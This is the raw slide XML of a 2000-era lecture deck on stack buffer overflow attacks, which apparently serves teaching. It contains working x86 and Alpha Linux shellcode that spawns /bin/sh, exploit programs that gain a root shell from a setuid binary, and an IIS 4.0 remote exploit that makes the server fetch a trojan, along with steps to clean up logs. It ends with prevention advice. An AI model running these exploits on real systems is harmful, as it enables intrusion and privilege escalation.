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128-FB98-4DE7-8F33-18CB9C46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46B-163E-4042-9539-F51B8D8E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686-6467-4DF3-B30C-70D334DF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48A-17C7-43F7-AB2C-8827B397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FCC-17D6-42EE-A6A9-1AEEBD5B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6F5-F44D-4555-AD3E-6F997E2E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50C-8596-465A-8075-F03201B3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4B4-7BCC-42AA-A0AC-A554E09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FF4-B648-4B86-8983-32DF6E51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ED2-B605-49AF-B986-1657B02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CF6-8550-4C04-A87C-67F6903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BEC-7A6F-48D6-B2B4-24A8185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A62F-BF71-4558-9264-76D00AF798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uffer overflow attack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aeho O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LUS01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ohhara@postech.edu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tack overflow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844560" y="2597040"/>
            <a:ext cx="334008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void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unctio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char *str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char buffer[10]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      </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i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strcpy(buffer,str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void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mai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char large_str[255]; int I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or (I=0;I&lt;255;I++) large_str[I] = ‘A’ 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unctio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large_str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901960" y="2368440"/>
            <a:ext cx="189864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Example pro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365760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344760"/>
            <a:ext cx="76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low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335268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high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2670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6483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3954600"/>
            <a:ext cx="76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39546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f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39546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돋움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954600"/>
            <a:ext cx="45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*st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4343400"/>
            <a:ext cx="358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AAAAAAAAAAAA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돋움"/>
              </a:rPr>
              <a:t>AA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AAAAAAAAAA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4578480" y="4730400"/>
            <a:ext cx="3193920" cy="679320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 118080 w 3193920"/>
              <a:gd name="textAreaRight" fmla="*/ 3075840 w 3193920"/>
              <a:gd name="textAreaTop" fmla="*/ 24840 h 679320"/>
              <a:gd name="textAreaBottom" fmla="*/ 542520 h 679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6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Hackers can overwrite RET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7473960" y="40449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tack overflow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Vulnerable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oesn’t check buffer bounda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Executes with root permis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Exploit the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ut instructions into memo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Ex) execute /bin/s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hange return address to the instructi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tack overflow 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Find address of the shellcod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Brute force search near the stack point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eturn address is near the stack point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nsert NOPs in the head of the buff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When the hackers hit NOPs, execute the shellc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lassica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38080" y="5486400"/>
            <a:ext cx="7391520" cy="762120"/>
            <a:chOff x="838080" y="5486400"/>
            <a:chExt cx="7391520" cy="762120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="164" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="838080" y="5486400"/>
              <a:ext cx="739152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굴림"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr b="0" lang="ko-KR" sz="2400" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="굴림"/>
                </a:rPr>
                <a:t>NOPs           Shellcode          Return addres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tack overflow (6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Examine shellcod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81952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shell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ar *name[2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name[0]="/bin/sh"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name[1]=NULL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execve(name[0],name,NULL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tack overflow (7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7724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gcc -o shell -g -static shell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3} $ gdb sh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(gdb) disassemb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(gdb) disassemble execv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o execute “/bin/sh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bin/sh\0” in the memor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he address of “/bin/sh\0” in the memor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%eax=0xb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%ebx=The address of “/bin/sh\0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%ecx=The address of the address of “/bin/sh\0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%edx=nul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Execute 0x80 interru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6688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jmp      0x1f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eb\x1f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popl     %esi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5e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ovl     %esi,0x8(%esi)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9\x76\x08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xorl     %eax,%ea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31\xc0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ovb     %eax,0x7(%esi)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8\x46\x07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ovl     %eax,0xc(%esi)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9\x46\x0c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ovb     $0xb,%al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b0\x0b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ovl     %esi,%eb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9\xf3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ake shellcod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98108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leal     0x8(%esi),%ec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d\x4e\x08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leal     0xc(%esi),%ed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d\x56\x0c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     $0x80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cd\x80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xorl     %ebx,%eb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31\xdb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ovl     %ebx,%ea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9\xd8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c      %ea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40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     $0x80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cd\x80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all     -0x24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e8\xdc\xff\xff\xff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.string  "/bin/sh“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/bin/sh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438280"/>
            <a:ext cx="6096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eb 1f 5e 89  76 08 31 c0 88 46 07 89 46  0c b0 0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581280"/>
            <a:ext cx="6096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89 f3 8d 4e  08 8d 56 0c cd 80 31 db 89  d8 40 c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5867280"/>
            <a:ext cx="6096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5867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5867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724280"/>
            <a:ext cx="6096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 e8 dc ff  ff ff 2f 62 69 6e 2f 73 6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4724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724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4724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2438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3581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4724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99072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12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3526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3000" y="4343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143000" y="3276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209680" y="289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28195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jm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4267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571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70102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676520" y="5714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29492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8098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4343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3434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ore the address of “/bin/sh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4771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334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057400" y="5714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00400" y="5714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5715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16292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19051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%eax=0x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410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%eb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5410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%ec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6521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%ed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209680" y="2285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21337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ore the address of “/bin/sh” to %es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est the shellcod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666880"/>
            <a:ext cx="77724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testsc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shellcode[]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eb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b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9\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd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0\xe8\xdc\xff\xff\xff/bin/sh"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typedef void (*F)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tents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at is buffer overflow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y do hackers try to overflow buffer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emory struc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tack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ntel x86 linux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pha linux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ntel x86 Windows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6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 f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p=(F)(&amp;shellcod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p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./tests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ash$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7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xploit vulnerable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66688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vul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ring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main(int argc,char **argv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buff[1024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trcpy(buff,argv[1]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8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ls –l vu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s--x--x   1 root     root        11709 Jan  6 15:55 vul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3} $ ./vul AAAAA . . . AAAA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4} $ cat exp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lib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ALIGN                             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OFFSET                            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RET_POSITION                   102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9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RANGE                            2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NOP                            0x9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shellcode[]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eb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b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9\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd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80\xe8\xdc\xff\xff\xff/bin/sh"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nsigned long get_sp(voi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__asm__("movl %esp,%eax"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10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981080"/>
            <a:ext cx="7772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n(int argc,char **argv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buff[RET_POSITION+RANGE+ALIGN+1],*ptr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long addr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nsigned long s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offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1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f(argc&gt;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offset=atoi(argv[1]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1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98108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p=get_sp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addr=sp-offse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or(i=0;i&lt;bsize;i+=4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i+ALIGN]=(addr&amp;0x000000ff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i+ALIGN+1]=(addr&amp;0x0000ff00)&gt;&gt;8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i+ALIGN+2]=(addr&amp;0x00ff0000)&gt;&gt;16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i+ALIGN+3]=(addr&amp;0xff000000)&gt;&gt;2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or(i=0;i&lt;bsize-RANGE*2-strlen(shellcode)-1;i++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i]=NO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1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981080"/>
            <a:ext cx="77724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ptr=buff+bsize-RANGE*2-strlen(shellcode)-1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or(i=0;i&lt;strlen(shellcode);i++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*(ptr++)=shellcode[i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bsize-1]='\0'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printf("Jump to 0x%08x\n",addr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execl("./vul","vul",buff,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intel x86 linux (1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981080"/>
            <a:ext cx="7772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5} $ ./exp 5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Jump to 0xbfffeee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ash# whoa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ash#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Alpha CPU uses 64bit addres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e address has many ‘\0’ character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an’t add two or more return addresses in the tail of the exploit c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allsys instruction contains ‘\0’ character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hellcode have to modify itself to use callsys instru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Return address is pushed after local variable is push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ackers have to overwrite second return addr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All instructions must be aliagn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ackers have to pad 0~3 character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Contents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dvanced stack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ow to prevent buffer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xploit vulnerable program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66688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vul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ring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void vulfunc(char *buf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localbuf[1024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trcpy(localbuf+1,buf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1981080"/>
            <a:ext cx="77724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n(int argc,char **argv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f(argc&gt;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vulfunc(argv[1]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cat exp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ring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OFFSET                            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ALIGN                             3     /* 0, 1, 2, 3          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981080"/>
            <a:ext cx="77724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RET_POSITION                   1028     /* 0, 4, 8, 12, . . .  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define NOP              "\x1f\x04\xff\x47"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shellcode[]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30\x15\xd9\x43" /* subq $30,200,$16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1\x74\xf0\x47" /* bis $31,0x83,$17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2\x14\x02\x42" /* addq $16,16,$18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fc\xff\x32\xb2" /* stl $17,-4($18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2\x94\x09\x42" /* addq $16,76,$18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fc\xff\x32\xb2" /* stl $17,-4($18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ff\x47\x3f\x26" /* ldah $17,0x47ff($31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6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198108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f\x04\x31\x22“ /* lda $17,0x041f($17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fc\xff\x30\xb2“ /* stl $17,-4($16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f7\xff\x1f\xd2“ /* bsr $16,-32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0\x04\xff\x47“ /* clr $16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1\x14\xe3\x43“ /* addq $31,24,$17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20\x35\x20\x42“ /* subq $17,1,$0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ff\xff\xff\xff“ /* callsys ( disguised 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30\x15\xd9\x43“ /* subq $30,200,$16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31\x15\xd8\x43“ /* subq $30,192,$17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2\x04\xff\x47“ /* clr $18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40\xff\x1e\xb6“ /* stq $16,-192($30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7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198108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48\xff\xfe\xb7" /* stq $31,-184($30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98\xff\x7f\x26" /* ldah $19,0xff98($31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d0\x8c\x73\x22“ /* lda $19,0x8cd0($19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3\x05\xf3\x47" /* ornot $31,$19,$19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3c\xff\x7e\xb2" /* stl $19,-196($30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69\x6e\x7f\x26" /* ldah $19,0x6e69($31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2f\x62\x73\x22" /* lda $19,0x622f($19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38\xff\x7e\xb2" /* stl $19,-200($30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13\x94\xe7\x43" /* addq $31,60,$19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20\x35\x60\x42" /* subq $19,1,$0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"\xff\xff\xff\xff";/* callsys ( disguised ) *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8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198108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nsigned long get_sp(voi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__asm__("bis $31,$30,$0"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main(int argc,char **argv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buff[RET_POSITION+8+ALIGN+1],*ptr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*no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offset=OFFSET,bsize=RET_POSITION+8+ALIGN+1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nsigned long sp,addr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9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981080"/>
            <a:ext cx="77724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f(argc&gt;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offset=atoi(argv[1]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nop=NO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or(i=0;i&lt;bsize;i++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i]='a'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or(i=0;i&lt;bsize;i++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i+ALIGN]=nop[i%4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p=get_sp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addr=sp-offse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10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981080"/>
            <a:ext cx="77724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ptr=buff+bsize-strlen(shellcode)-8-1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or(i=0;i&lt;strlen(shellcode);i++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*(ptr++)=shellcode[i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]=(addr&amp;0x00000000000000ff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+1]=(addr&amp;0x000000000000ff00)&gt;&gt;8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+2]=(addr&amp;0x0000000000ff0000)&gt;&gt;16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+3]=(addr&amp;0x00000000ff000000)&gt;&gt;2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+4]=(addr&amp;0x000000ff00000000)&gt;&gt;3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1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981080"/>
            <a:ext cx="77724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+5]=(addr&amp;0x0000ff0000000000)&gt;&gt;4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+6]=(addr&amp;0x00ff000000000000)&gt;&gt;48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RET_POSITION+ALIGN+7]=(addr&amp;0xff00000000000000)&gt;&gt;56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uff[bsize-1]='\0'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printf("Jump to 0x%016x\n",addr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execl("./vul","vul",buff,NULL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alpha linux (1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98108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3} $ ./ex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Jump to 0x000000001ffff6c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llegal instru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4} $ ./exp 4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Jump to 0x000000001ffff53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ash# whoa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bash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 is buffer overflow?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rite unexpected memory area by overflowing buff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e most famous hacking techniqu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lmost all cases, buffer overflow means stack buffer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Recently, heap buffer overflow attack is introduc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WindowsNT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9810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X:\Code&gt;iishack example.com 80 ourserver.com/ncx.exe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---(IIS 4.0 remote buffer overflow exploit)-----------------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(c) dark spyrit -- barns@eeye.com.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http://www.eEye.com</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1800"/>
            </a:b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usage: iishack ]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eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe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do not include 'http://' before hosts!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</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1800"/>
            </a:b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Data sent!</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1800"/>
            </a:b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Note: Give it enough time to download your troja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Stack overflow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WindowsNT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9810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X:\Code&gt;telnet example.com 80</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1800"/>
            </a:b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icrosoft(R) Windows NT(TM)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(C) Copyright 1985-1996 Microsoft Corp.</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1800"/>
            </a:b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:\&gt;[You have full access to the system, happy browsing :)]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:\&gt;[Add a scheduled task to restart inetinfo in X minutes]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:\&gt;[Add a scheduled task to delete ncx.exe in X-1 minutes]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:\&gt;[Clean up any trace or logs we might have left behind.]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:\&gt;ex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Advanced stack overflow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oo small buffer siz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ut the shellcode in the environment variab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Remote stack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Put spawning shell daemon code into the shellc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Filtering the buff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ake self modifying shellc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ow to prevent buffer overflow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non-executable stack patc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t can be broken with heap overflo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atch the vulnerable programs as soon as possib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Do not use strcpy(), strcat(), scanf(), sprintf(), gets(), and so on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ey don’t check the bounda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 is buffer overflow?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achine and OS dependent hacking techniqu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y do hackers try to overflow buffer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ers can execute arbitrary command by overflowing buffer while executing a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 program can be a setuid or setgid program or a daemon progra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Hackers can execute arbitrary command with setuid, setgid, or daemon’s permis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emory structur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130560" y="2749680"/>
            <a:ext cx="2502000" cy="3111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733920"/>
            <a:ext cx="25146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724280"/>
            <a:ext cx="25146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032360" y="3117960"/>
            <a:ext cx="622080" cy="30564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  <a:ea typeface="돋움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4038480"/>
            <a:ext cx="622440" cy="30564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  <a:ea typeface="돋움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032360" y="5099040"/>
            <a:ext cx="774720" cy="30564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  <a:ea typeface="돋움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743200"/>
            <a:ext cx="205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lower memory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5562720"/>
            <a:ext cx="2057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higher memory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274320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996840" y="2825640"/>
            <a:ext cx="1892520" cy="901800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 1892520"/>
              <a:gd name="textAreaRight" fmla="*/ 1892880 w 189252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8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19158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Text sec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of the executable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996840" y="3816360"/>
            <a:ext cx="1892520" cy="901800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 1892520"/>
              <a:gd name="textAreaRight" fmla="*/ 1892880 w 189252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8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19158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996840" y="4807080"/>
            <a:ext cx="1892520" cy="1054080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 1892520"/>
              <a:gd name="textAreaRight" fmla="*/ 1892880 w 18925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8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19158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arame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Arial"/>
                <a:ea typeface="돋움"/>
              </a:rPr>
              <a:t>return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local vari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et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334120" y="5105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tack overflow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876920" y="2438280"/>
            <a:ext cx="1676160" cy="1600200"/>
            <a:chOff x="4876920" y="2438280"/>
            <a:chExt cx="1676160" cy="1600200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4876920" y="24382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24382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2742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76920" y="304776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6920" y="33526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920" y="3657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920" y="396216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28840" y="335268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ff0033"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="돋움"/>
                </a:rPr>
                <a:t>Return Addr.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8840" y="365724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8840" y="304776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f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28840" y="274284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ocal Var.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086600" y="4800600"/>
            <a:ext cx="1219320" cy="26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tack of Main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3200400"/>
            <a:ext cx="1447920" cy="26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tack of function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6788160" y="2063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2362320"/>
            <a:ext cx="1295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lower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563868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higher mem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2438280"/>
            <a:ext cx="0" cy="335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2120" y="2971800"/>
            <a:ext cx="3657600" cy="2133720"/>
            <a:chOff x="762120" y="2971800"/>
            <a:chExt cx="3657600" cy="2133720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="87" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="762120" y="3276720"/>
              <a:ext cx="334008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void function(int a, int b, int c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har buffer[8] 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void main(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unction(1,2,3) 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2971800"/>
              <a:ext cx="19051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Example progra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76920" y="4038480"/>
            <a:ext cx="1676160" cy="1600200"/>
            <a:chOff x="4876920" y="4038480"/>
            <a:chExt cx="1676160" cy="1600200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="90" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4876920" y="40384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40384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6920" y="43430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920" y="464796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4952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52574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76920" y="556236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8840" y="495288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ff0033"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="돋움"/>
                </a:rPr>
                <a:t>Return Addr.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8840" y="525744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8840" y="464796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f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8840" y="4343040"/>
              <a:ext cx="137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ocal Var.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0" y="2743200"/>
            <a:ext cx="0" cy="12193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343400"/>
            <a:ext cx="0" cy="12193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274320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629040" y="396252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629040" y="434340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629040" y="556272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3352680"/>
            <a:ext cx="1522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495288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tack overflow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7169040" y="2063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2362320"/>
            <a:ext cx="1295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lower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63868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higher mem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2438280"/>
            <a:ext cx="0" cy="3353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51320" y="3200400"/>
            <a:ext cx="1676520" cy="1981080"/>
            <a:chOff x="5251320" y="3200400"/>
            <a:chExt cx="1676520" cy="1981080"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="115" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5251320" y="35812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1320" y="32767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1320" y="38862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1320" y="41911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51320" y="44956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320" y="48006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51320" y="51055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3600" y="480060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  <a:ea typeface="돋움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03600" y="449568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  <a:ea typeface="돋움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03600" y="419112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  <a:ea typeface="돋움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03600" y="388620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  <a:ea typeface="돋움"/>
                </a:rPr>
                <a:t>ret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03600" y="358128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3333cc"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="돋움"/>
                </a:rPr>
                <a:t>sf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03600" y="327672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  <a:ea typeface="돋움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27840" y="320040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1320" y="320040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495680" y="381636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2971800"/>
            <a:ext cx="3492360" cy="2057400"/>
            <a:chOff x="762120" y="2971800"/>
            <a:chExt cx="3492360" cy="2057400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="132" name=""/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="762120" y="3200400"/>
              <a:ext cx="334008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void function(int a, int b, int c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har buffer[8] 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void main(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unction(1,2,3) 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971800"/>
              <a:ext cx="1511280" cy="25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예제 프로그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238880" y="3276720"/>
            <a:ext cx="0" cy="18288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009920" y="327672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009920" y="510552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191120"/>
            <a:ext cx="1526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038480"/>
            <a:ext cx="1447560" cy="26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tack of function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05:48:20Z</dcterms:created>
  <dc:creator>Taeho Oh</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Taeho Oh</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2000-01-06T12:31:00Z</dcterms:modified>
  <cp:revision>68</cp:revision>
  <dc:subject/>
  <dc:title>Buffer overflow</dc:title>
</cp:coreProperties>
</file>